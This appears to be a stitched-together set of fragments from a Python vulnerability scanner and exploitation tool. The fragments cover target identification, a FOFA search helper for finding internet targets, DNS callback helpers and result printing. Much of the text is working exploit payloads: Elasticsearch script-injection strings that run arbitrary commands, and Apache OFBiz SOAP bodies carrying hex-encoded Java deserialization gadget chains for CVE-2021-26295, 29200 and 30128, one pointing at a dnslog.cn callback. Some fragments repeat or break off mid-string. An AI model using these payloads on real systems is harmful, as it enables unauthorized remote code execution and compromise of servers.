def __init__(self, url):
# http.client.HTTPConnection._http_vsn_str = 'HTTP/1.1'
self.url = url
if self.url[-1] == "/":
self.url = self.url[:-1]
self.raw_data = None
self.vul_info = {}
self.ua = globals.get_value("UA") # 获取全局变量UA
self.timeout = globals.get_value("TIMEOUT") # 获取全局变量UA
self.headers = globals.get_value("HEADERS") # 获取全局变量HEADERS
self.threadLock = threading.Lock()
self.getipport = urlparse(self.url)
self.hostname = self.getipport.hostname
self.port = self.getipport.port
if self.port == None and r"https://" in self.url:
self.port = 443
elif self.port == None and r"http://" in self.url:
self.port = 80
if r"https://" in self.url:
self.url = "https://" + self.hostname + ":" + str(self.port)
if r"http://" in self.url:
self.url = "http://" + self.hostname + ":" + str(self.port)
self.host = self.hostname + ":" + str(self.port)
self.headers = {
'Host': "" + self.host,
'Accept': '*/*',
'Connection': 'close',
'Accept-Language': 'en',
'User-Agent': self.ua,
'Content-Type': 'application/x-www-form-urlencoded'
}
self.payload_cve_2014_3120 = r'''{"size":1,"query":{"filtered":{"query":{"match_all":{}}}},"script_fields":''' \
r'''{"command":{"script":"import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec''' \
r'''(\"RECOMMAND\").getInputStream()).useDelimiter(\"\\\\A\").next();"}}}'''
self.payload_cve_2015_1427 = r'''{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"RECOMMAND\").getText()"}}}'''
def start(url, webapps_identify):
ua = globals.get_value("UA") # 获取全局变量UA
timeout = globals.get_value("TIMEOUT") # 获取全局变量UA
headers = {'User-Agent': ua}
try:
resp = requests.get(url, headers=headers, timeout=timeout, verify=False)
except:
resp = "null"
start = Identify(url)
start.flink(webapps_identify, resp, url)
start.tomcat(webapps_identify, resp, url)
start.fastjson(webapps_identify, url)
start.elasticsearch(webapps_identify, resp, url)
start.jenkins(webapps_identify, resp, url)
start.weblogic(webapps_identify, resp, url)
start.spring(webapps_identify, resp, url)
start.solr(webapps_identify, resp, url)
start.nexus(webapps_identify, resp, url)
start.jboss(webapps_identify, resp, url)
start.drupal(webapps_identify, resp, url)
start.struts2(webapps_identify, resp, url)
start.shiro(webapps_identify, resp, url)
start.druid(webapps_identify, resp, url)
start.eyou(webapps_identify, resp, url)
start.coremail(webapps_identify, resp, url)
if webapps_identify:
for a in webapps_identify:
print("\r{0}{1}".format(now.timed(de=0) + color.yel_info(), color.yellow(" The identification target is: " + a + " ")))
else:
webapps_identify.append("all")
print("\r{0}{1}".format(now.timed(de=0) + color.yel_info(), color.yellow(" Unable to identify target, Run all pocs ")))
def scan_print(vul_info):
try:
delay = globals.get_value("DELAY") # 获取全局变量DELAY
debug = globals.get_value("DEBUG") # 获取全局变量DEBUG
result = vul_info["prt_resu"]
prt_name = vul_info["prt_name"]
vul_name = vul_info["vul_name"]
vul_type = vul_info["vul_type"]
vul_numb = vul_info["vul_numb"]
info = vul_info["prt_info"]
if result == "PoCSuCCeSS": # 存在漏洞时候输出以下内容
print(now.timed(de=delay) + color.green("[+] The target is " + prt_name + " " + info))
# 丢给output模块判断是否输出文件
output("json", vul_info)
output("text", "--> [名称:" + vul_name + "] [编号:" + vul_numb + "] [类型:" + vul_type + "] " + info)
elif result == "PoC_MaYbE":
print(now.timed(de=delay) + color.green("[?] The target maybe " + prt_name + " " + info))
# 丢给output模块判断是否输出文件
output("json", vul_info)
output("text", "--> [名称:" + vul_name + "] [编号:" + vul_numb + "] [类型:" + vul_type + "] " + info)
else: # 否则就是没有洞
if debug == "debug":
print(now.timed(de=delay) + color.magenta("[-] The target no " + color.magenta(prt_name)))
else:
print("\r{0}{1}{2}".format(now.timed(de=delay),
color.magenta("[-] The target no "),
color.magenta(prt_name)), end=" \r", flush=True)
except IndexError as error:
print(now.timed(de=0) + color.red("[ERROR] " + error.__traceback__.tb_frame.f_globals['__file__']
+ " " + str(error.__traceback__.tb_lineno)))
def version_check():
version = globals.get_value("VULMAP") # 获取全局变量VULMAP版本号
timeout = globals.get_value("TIMEOUT") # 获取全局变量TIMEOUT
headers = globals.get_value("HEADERS") # 获取全局变量HEADERS
github_ver_url = "https://github.com/zhzyker/vulmap/blob/main/version"
now_warn = now.timed(de=0) + color.red_warn()
try:
github_ver_request = requests.get(url=github_ver_url,
headers=headers,
timeout=timeout)
version_res = r'blob-code blob-code-inner js-file-line">(.*)</td>'
github_ver = re.findall(version_res, github_ver_request.text,
re.S | re.M)[0]
if version == github_ver:
print(
now.timed(de=0) + color.yel_info() +
color.yellow(" Currently the latest version: " + version))
elif version < github_ver:
print(now_warn + color.red(" The current version is: " + version +
", Latest version: " + github_ver))
print(now_warn + color.red(
" Go to github https://github.com/zhzyker/vulmap update"))
else:
print(now_warn + color.red(" Unknown version: " + version))
except requests.exceptions.ConnectionError:
print(now_warn + color.red(" The current version is: " + version +
", Version check filed"))
except requests.exceptions.Timeout:
print(now_warn + color.red(" The current version is: " + version +
", Version check filed"))
def fofa(fofa, size):
timeout = globals.get_value("TIMEOUT") # 获取全局变量UA
headers = globals.get_value("HEADERS") # 获取全局变量HEADERS
email = globals.get_value("fofa_email")
key = globals.get_value("fofa_key")
fofa_target = []
keyword = base64.b64encode(str.encode(fofa))
qbase = keyword.decode('ascii')
api_url = "https://fofa.so/api/v1/search/all?email={email}&key={key}&size={size}&qbase64={qbase}".format(email=email, key=key, size=size, qbase=qbase)
print(now.timed(de=0) + color.yel_info() + color.yellow(" Fofa api: " + api_url))
try:
res = requests.get(api_url, headers=headers, timeout=timeout, verify=False)
if res.status_code != 200:
print(now.timed(de=0) + color.red_warn() + color.red(" " + res.text))
exit(0)
r = json.loads(res.text)
for i in r['results']:
fofa_target.append(i[0])
return fofa_target
except requests.exceptions.Timeout:
print(now.timed(de=0) + color.red_warn() + color.red(" Fofa API connection failed because of timeout "))
exit(0)
except requests.exceptions.ConnectionError:
print(now.timed(de=0) + color.red_warn() + color.red(" Fofa API connection failed because the connection failed "))
exit(0)
except Exception as e:
print(now.timed(de=0) + color.red_warn() + color.red(" Fofa API connection failed because unknown error "))
exit(0)
def __init__(self, url):
self.url = url
self.raw_data = None
self.vul_info = {}
self.ua = globals.get_value("UA") # 获取全局变量UA
self.timeout = globals.get_value("TIMEOUT") # 获取全局变量UA
self.headers = globals.get_value("HEADERS") # 获取全局变量HEADERS
self.threadLock = threading.Lock()
self.payload_cve_2021_26295_poc = '''<?xml version='1.0' encoding='UTF-8'?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header/><soapenv:Body><ns1:clearAllEntityCaches xmlns:ns1="http://ofbiz.apache.org/service/">
<ns1:cus-obj>aced0005737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000c770800000010000000017372000c6a6176612e6e65742e55524c962537361afce47203000749000868617368436f6465490004706f72744c0009617574686f726974797400124c6a6176612f6c616e672f537472696e673b4c000466696c6571007e00034c0004686f737471007e00034c000870726f746f636f6c71007e00034c000372656671007e00037870ffffffffffffffff740010RECOMMAND74000071007e0005740004687474707078740017687474703a2f2fRECOMMAND78</ns1:cus-obj></ns1:clearAllEntityCaches></soapenv:Body></soapenv:Envelope>'''
self.payload_cve_2021_29200_poc = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://ofbiz.apache.org/service/">
<soapenv:Header/>
<soapenv:Body>
<ser>
<map-Map>
<map-Entry>
<map-Key>
<cus-obj>ACED0005737200326A617661782E6D616E6167656D656E742E72656D6F74652E726D692E524D49436F6E6E656374696F6E496D706C5F5374756200000000000000020200007872001A6A6176612E726D692E7365727665722E52656D6F746553747562E9FEDCC98BE1651A0200007872001C6A6176612E726D692E7365727665722E52656D6F74654F626A656374D361B4910C61331E03000078707739000A556E69636173745265660010RECOMMAND0000005000000000600BBCF200000000000000000000000000000078</cus-obj>
</map-Key>
<map-Value>
<std-String/>
</map-Value>
</map-Entry>
</map-Map>
</ser>
</soapenv:Body>
</soapenv:Envelope>'''
self.payload_cve_2021_26295_exp_1 = '''<?xml version='1.0' encoding='UTF-8'?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header/><soapenv:Body><ns1:clearAllEntityCaches xmlns:ns1="http://ofbiz.apache.org/service/">
<ns1:cus-obj>aced0005737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f400000000000007708000000020000000273720028636f6d2e73756e2e73796e6469636174696f6e2e666565642e696d706c2e4f626a6563744265616e829907de7604944a0200034c000e5f636c6f6e6561626c654265616e74002d4c636f6d2f73756e2f73796e6469636174696f6e2f666565642f696d706c2f436c6f6e6561626c654265616e3b4c000b5f657175616c734265616e74002a4c636f6d2f73756e2f73796e6469636174696f6e2f666565642f696d706c2f457175616c734265616e3b4c000d5f746f537472696e674265616e74002c4c636f6d2f73756e2f73796e6469636174696f6e2f666565642f696d706c2f546f537472696e674265616e3b78707372002b636f6d2e73756e2e73796e6469636174696f6e2e666565642e696d706c2e436c6f6e6561626c654265616edd61bbc5334f6b770200024c00115f69676e6f726550726f7065727469657374000f4c6a6176612f7574696c2f5365743b4c00045f6f626a7400124c6a6176612f6c616e672f4f626a6563743b78707372001e6a6176612e7574696c2e436f6c6c656374696f6e7324456d70747953657415f5721db403cb2802000078707371007e00027371007e000771007e000c7372003a636f6d2e73756e2e6f72672e6170616368652e78616c616e2e696e7465726e616c2e78736c74632e747261782e54656d706c61746573496d706c09574fc16eacab3303000649000d5f696e64656e744e756d62657249000e5f7472616e736c6574496e6465785b000a5f62797465636f6465737400035b5b425b00065f636c6173737400125b4c6a6176612f6c616e672f436c6173733b4c00055f6e616d657400124c6a6176612f6c616e672f537472696e673b4c00115f6f757470757450726f706572746965737400164c6a6176612f7574696c2f50726f706572746965733b787000000000ffffffff757200035b5b424bfd19156767db37020000787000000002757200025b42acf317f8060854e00200007870000006a9cafebabe0000003200390a0003002207003707002507002601001073657269616c56657273696f6e5549440100014a01000d436f6e7374616e7456616c756505ad2093f391ddef3e0100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c6501000474686973010013537475625472616e736c65745061796c6f616401000c496e6e6572436c61737365730100354c79736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747324537475625472616e736c65745061796c6f61643b0100097472616e73666f726d010072284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b5b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b2956010008646f63756d656e7401002d4c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b01000868616e646c6572730100425b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b01000a457863657074696f6e730700270100a6284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b29560100086974657261746f720100354c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b01000768616e646c65720100414c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b01000a536f7572636546696c6501000c476164676574732e6a6176610c000a000b07002801003379736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747324537475625472616e736c65745061796c6f6164010040636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f72756e74696d652f41627374726163745472616e736c65740100146a6176612f696f2f53657269616c697a61626c65010039636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f5472616e736c6574457863657074696f6e01001f79736f73657269616c2f7061796c6f6164732f7574696c2f476164676574730100083c636c696e69743e0100116a6176612f6c616e672f52756e74696d6507002a01000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b0c002c002d0a002b002e010015RECOMMAND08003001000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0c003200330a002b003401000d537461636b4d61705461626c6501001d79736f73657269616c2f50776e6572333139333833303730313438303701001f4c79736f73657269616c2f50776e657233313933383330373031343830373b002100020003000100040001001a000500060001000700000002000800040001000a000b0001000c0000002f00010001000000052ab70001b100000002000d0000000600010000002f000e0000000c000100000005000f003800000001001300140002000c0000003f0000000300000001b100000002000d00000006000100000034000e00000020000300000001000f0038000000000001001500160001000000010017001800020019000000040001001a00010013001b0002000c000000490000000400000001b100000002000d00000006000100000038000e0000002a000400000001000f003800000000000100150016000100000001001c001d000200000001001e001f00030019000000040001001a00080029000b0001000c00000024000300020000000fa70003014cb8002f1231b6003557b1000000010036000000030001030002002000000002002100110000000a000100020023001000097571007e0017000001d4cafebabe00000032001b0a0003001507001707001807001901001073657269616c56657273696f6e5549440100014a01000d436f6e7374616e7456616c75650571e669ee3c6d47180100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c6501000474686973010003466f6f01000c496e6e6572436c61737365730100254c79736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747324466f6f3b01000a536f7572636546696c6501000c476164676574732e6a6176610c000a000b07001a01002379736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747324466f6f0100106a6176612f6c616e672f4f626a6563740100146a6176612f696f2f53657269616c697a61626c6501001f79736f73657269616c2f7061796c6f6164732f7574696c2f47616467657473002100020003000100040001001a000500060001000700000002000800010001000a000b0001000c0000002f00010001000000052ab70001b100000002000d0000000600010000003c000e0000000c000100000005000f001200000002001300000002001400110000000a000100020016001000097074000450776e72707701007873720028636f6d2e73756e2e73796e6469636174696f6e2e666565642e696d706c2e457175616c734265616ef58a18bbe5f618110200024c000a5f6265616e436c6173737400114c6a6176612f6c616e672f436c6173733b4c00045f6f626a71007e000978707672001d6a617661782e786d6c2e7472616e73666f726d2e54656d706c617465730000000000000000000000787071007e00147372002a636f6d2e73756e2e73796e6469636174696f6e2e666565642e696d706c2e546f537472696e674265616e09f58e4a0f23ee310200024c000a5f6265616e436c61737371007e001c4c00045f6f626a71007e0009787071007e001f71007e00147371007e001b7671007e000271007e000d7371007e002071007e002371007e000d71007e000671007e000671007e000678</ns1:cus-obj></ns1:clearAllEntityCaches></soapenv:Body></soapenv:Envelope>'''
self.payload_cve_2021_26295_exp_2 = '''<?xml version='1.0' encoding='UTF-8'?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header/><soapenv:Body><ns1:clearAllEntityCaches xmlns:ns1="http://ofbiz.apache.org/service/">
<ns1:cus-obj>aced0005737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f400000000000007708000000020000000273720028636f6d2e73756e2e73796e6469636174696f6e2e666565642e696d706c2e4f626a6563744265616e829907de7604944a0200034c000e5f636c6f6e6561626c654265616e74002d4c636f6d2f73756e2f73796e6469636174696f6e2f666565642f696d706c2f436c6f6e6561626c654265616e3b4c000b5f657175616c734265616e74002a4c636f6d2f73756e2f73796e6469636174696f6e2f666565642f696d706c2f457175616c734265616e3b4c000d5f746f537472696e674265616e74002c4c636f6d2f73756e2f73796e6469636174696f6e2f666565642f696d706c2f546f537472696e674265616e3b78707372002b636f6d2e73756e2e73796e6469636174696f6e2e666565642e696d706c2e436c6f6e6561626c654265616edd61bbc5334f6b770200024c00115f69676e6f726550726f7065727469657374000f4c6a6176612f7574696c2f5365743b4c00045f6f626a7400124c6a6176612f6c616e672f4f626a6563743b78707372001e6a6176612e7574696c2e436f6c6c656374696f6e7324456d70747953657415f5721db403cb2802000078707371007e00027371007e000771007e000c7372003a636f6d2e73756e2e6f72672e6170616368652e78616c616e2e696e7465726e616c2e78736c74632e747261782e54656d706c61746573496d706c09574fc16eacab3303000649000d5f696e64656e744e756d62657249000e5f7472616e736c6574496e6465785b000a5f62797465636f6465737400035b5b425b00065f636c6173737400125b4c6a6176612f6c616e672f436c6173733b4c00055f6e616d657400124c6a6176612f6c616e672f537472696e673b4c00115f6f757470757450726f706572746965737400164c6a6176612f7574696c2f50726f706572746965733b787000000000ffffffff757200035b5b424bfd19156767db37020000787000000002757200025b42acf317f8060854e00200007870000006f1cafebabe0000003200390a0003002207003707002507002601001073657269616c56657273696f6e5549440100014a01000d436f6e7374616e7456616c756505ad2093f391ddef3e0100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c6501000474686973010013537475625472616e736c65745061796c6f616401000c496e6e6572436c61737365730100354c79736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747324537475625472616e736c65745061796c6f61643b0100097472616e73666f726d010072284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b5b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b2956010008646f63756d656e7401002d4c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b01000868616e646c6572730100425b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b01000a457863657074696f6e730700270100a6284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b29560100086974657261746f720100354c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b01000768616e646c65720100414c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b01000a536f7572636546696c6501000c476164676574732e6a6176610c000a000b07002801003379736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747324537475625472616e736c65745061796c6f6164010040636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f72756e74696d652f41627374726163745472616e736c65740100146a6176612f696f2f53657269616c697a61626c65010039636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f5472616e736c6574457863657074696f6e01001f79736f73657269616c2f7061796c6f6164732f7574696c2f476164676574730100083c636c696e69743e0100116a6176612f6c616e672f52756e74696d6507002a01000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b0c002c002d0a002b002e01005dRECOMMAND08003001000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0c003200330a002b003401000d537461636b4d61705461626c6501001d79736f73657269616c2f50776e6572333430393038363231343339323301001f4c79736f73657269616c2f50776e657233343039303836323134333932333b002100020003000100040001001a000500060001000700000002000800040001000a000b0001000c0000002f00010001000000052ab70001b100000002000d0000000600010000002f000e0000000c000100000005000f003800000001001300140002000c0000003f0000000300000001b100000002000d00000006000100000034000e00000020000300000001000f0038000000000001001500160001000000010017001800020019000000040001001a00010013001b0002000c000000490000000400000001b100000002000d00000006000100000038000e0000002a000400000001000f003800000000000100150016000100000001001c001d000200000001001e001f00030019000000040001001a00080029000b0001000c00000024000300020000000fa70003014cb8002f1231b6003557b1000000010036000000030001030002002000000002002100110000000a000100020023001000097571007e0017000001d4cafebabe00000032001b0a0003001507001707001807001901001073657269616c56657273696f6e5549440100014a01000d436f6e7374616e7456616c75650571e669ee3c6d47180100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c6501000474686973010003466f6f01000c496e6e6572436c61737365730100254c79736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747324466f6f3b01000a536f7572636546696c6501000c476164676574732e6a6176610c000a000b07001a01002379736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747324466f6f0100106a6176612f6c616e672f4f626a6563740100146a6176612f696f2f53657269616c697a61626c6501001f79736f73657269616c2f7061796c6f6164732f7574696c2f47616467657473002100020003000100040001001a000500060001000700000002000800010001000a000b0001000c0000002f00010001000000052ab70001b100000002000d0000000600010000003c000e0000000c000100000005000f001200000002001300000002001400110000000a000100020016001000097074000450776e72707701007873720028636f6d2e73756e2e73796e6469636174696f6e2e666565642e696d706c2e457175616c734265616ef58a18bbe5f618110200024c000a5f6265616e436c6173737400114c6a6176612f6c616e672f436c6173733b4c00045f6f626a71007e000978707672001d6a617661782e786d6c2e7472616e73666f726d2e54656d706c617465730000000000000000000000787071007e00147372002a636f6d2e73756e2e73796e6469636174696f6e2e666565642e696d706c2e546f537472696e674265616e09f58e4a0f23ee310200024c000a5f6265616e436c61737371007e001c4c00045f6f626a71007e0009787071007e001f71007e00147371007e001b7671007e000271007e000d7371007e002071007e002371007e000d71007e000671007e000671007e000678</ns1:cus-obj></ns1:clearAllEntityCaches></soapenv:Body></soapenv:Envelope>'''
self.payload_cve_2021_30128_poc = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header/>
<soapenv:Body>
<ser>
<map-HashMap>
<map-Entry>
<map-Key>
<cus-obj>aced0005737200176a6176612e7574696c2e5072696f72697479517565756594da30b4fb3f82b103000249000473697a654c000a636f6d70617261746f727400164c6a6176612f7574696c2f436f6d70617261746f723b7870000000027372003f6f72672e6170616368652e636f6d6d6f6e732e6265616e7574696c732e4265616e436f6d70617261746f723c6a6176612e4265616e436f6d70617261746f72e3a188ea7322a4480200024c000a636f6d70617261746f7271007e00014c000870726f70657274797400124c6a6176612f6c616e672f537472696e673b7870737200596f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e636f6d70617261746f72732e436f6d70617261626c65436f6d70617261746f723c6a6176612e436f6d70617261626c65436f6d70617261746f72fbf49925b86eb13702000078707400106f757470757450726f706572746965737704000000037372004d636f6d2e73756e2e6f72672e6170616368652e78616c616e2e696e7465726e616c2e78736c74632e747261782e54656d706c61746573496d706c3c6a6176612e54656d706c61746573496d706c09574fc16eacab3303000649000d5f696e64656e744e756d62657249000e5f7472616e736c6574496e6465785b000a5f62797465636f6465737400035b5b425b00065f636c6173737400125b4c6a6176612f6c616e672f436c6173733b4c00055f6e616d6571007e00044c00115f6f757470757450726f706572746965737400164c6a6176612f7574696c2f50726f706572746965733b787000000000ffffffff757200035b5b424bfd19156767db37020000787000000002757200025b42acf317f8060854e00200007870000006a9cafebabe0000003200390a0003002207003707002507002601001073657269616c56657273696f6e5549440100014a01000d436f6e7374616e7456616c756505ad2093f391ddef3e0100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c6501000474686973010013537475625472616e736c65745061796c6f616401000c496e6e6572436c61737365730100354c79736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747324537475625472616e736c65745061796c6f61643b0100097472616e73666f726d010072284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b5b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b2956010008646f63756d656e7401002d4c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b01000868616e646c6572730100425b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b01000a457863657074696f6e730700270100a6284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b29560100086974657261746f720100354c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b01000768616e646c65720100414c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b01000a536f7572636546696c6501000c476164676574732e6a6176610c000a000b07002801003379736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747324537475625472616e736c65745061796c6f6164010040636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f72756e74696d652f41627374726163745472616e736c65740100146a6176612f696f2f53657269616c697a61626c65010039636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f5472616e736c6574457863657074696f6e01001f79736f73657269616c2f7061796c6f6164732f7574696c2f476164676574730100083c636c696e69743e0100116a6176612f6c616e672f52756e74696d6507002a01000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b0c002c002d0a002b002e010015RECOMMAND08003001000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0c003200330a002b003401000d537461636b4d61705461626c6501001d79736f73657269616c2f50776e6572333430333134313538313736383601001f4c79736f73657269616c2f50776e657233343033313431353831373638363b002100020003000100040001001a000500060001000700000002000800040001000a000b0001000c0000002f00010001000000052ab70001b100000002000d0000000600010000002f000e0000000c000100000005000f003800000001001300140002000c0000003f0000000300000001b100000002000d00000006000100000034000e00000020000300000001000f0038000000000001001500160001000000010017001800020019000000040001001a00010013001b0002000c000000490000000400000001b100000002000d00000006000100000038000e0000002a000400000001000f003800000000000100150016000100000001001c001d000200000001001e001f00030019000000040001001a00080029000b0001000c00000024000300020000000fa70003014cb8002f1231b6003557b1000000010036000000030001030002002000000002002100110000000a000100020023001000097571007e0010000001d4cafebabe00000032001b0a0003001507001707001807001901001073657269616c56657273696f6e5549440100014a01000d436f6e7374616e7456616c75650571e669ee3c6d47180100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c6501000474686973010003466f6f01000c496e6e6572436c61737365730100254c79736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747324466f6f3b01000a536f7572636546696c6501000c476164676574732e6a6176610c000a000b07001a01002379736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747324466f6f0100106a6176612f6c616e672f4f626a6563740100146a6176612f696f2f53657269616c697a61626c6501001f79736f73657269616c2f7061796c6f6164732f7574696c2f47616467657473002100020003000100040001001a000500060001000700000002000800010001000a000b0001000c0000002f00010001000000052ab70001b100000002000d0000000600010000003c000e0000000c000100000005000f001200000002001300000002001400110000000a000100020016001000097074000450776e72707701007871007e000d78</cus-obj>
</map-Key>
<map-Value>
<std-String value="http://3zs56v.dnslog.cn"/>
</map-Value>
</map-Entry>
</map-HashMap>
</ser>
</soapenv:Body>
</soapenv:Envelope>'''
self.payload_cve_2021_30128_exp = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
def dnslog_cn():
headers_dnslog = {
'User-Agent':
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36',
'Host': 'www.dnslog.cn',
'Cookie':
'UM_distinctid=1703200149e449-053d4e8089c385-741a3944-1fa400-1703200149f80a; PHPSESSID=jfhfaj7op8u8i5sif6d4ai30j4; CNZZDATA1278305074=1095383570-1581386830-null%7C1581390548',
'Accept': '*/*',
'Referer': 'http://www.dnslog.cn/',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Connection': 'close'
}
dnslog_api = "http://www.dnslog.cn/getdomain.php?t=0.08025501698741366"
d_p = globals.get_value("DNS_DNSLOG_HOST")
try:
if d_p is None:
dns = requests.get(dnslog_api,
headers=headers_dnslog,
timeout=timeout,
verify=False)
dns_host = random_md5() + "." + dns.text
globals.set_value("DNS_DNSLOG_HOST", dns.text)
return dns_host
else:
dns_host = random_md5() + "." + globals.get_value(
"DNS_DNSLOG_HOST")
return dns_host
except Exception:
return "error"
def hyuga_co():
headers_hyuga = {
'User-Agent':
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36',
'Connection': 'close',
'Accept': '*/*',
'Accept-Language':
'zh,zh-TW;q=0.9,en-US;q=0.8,en;q=0.7,zh-CN;q=0.6'
}
hyuga_api = "http://api.hyuga.co/v1/users"
hyuga_host = globals.get_value("hyuga_domain")
hyuga_token = globals.get_value("hyuga_token")
try:
if r"xxxxxx" in hyuga_host: # 如果没有指定域名和token,就自动获取, 第一次获取token
if r"xxxxxx" in hyuga_token:
dns = requests.post(hyuga_api,
headers=headers_hyuga,
timeout=timeout,
verify=False)
hyuga_host = json.loads(dns.text)["data"]["identity"]
dns_host = random_md5() + "." + str(hyuga_host)
hyuga_token = json.loads(dns.text)["data"]["token"]
globals.set_value("hyuga_token", hyuga_token)
globals.set_value("hyuga_domain", hyuga_host)
return dns_host
else:
return "bug"
else:
dns_host = random_md5() + "." + hyuga_host
return dns_host
except Exception as e:
pass
def __init__(self, url):
self.url = url
self.raw_data = None
self.vul_info = {}
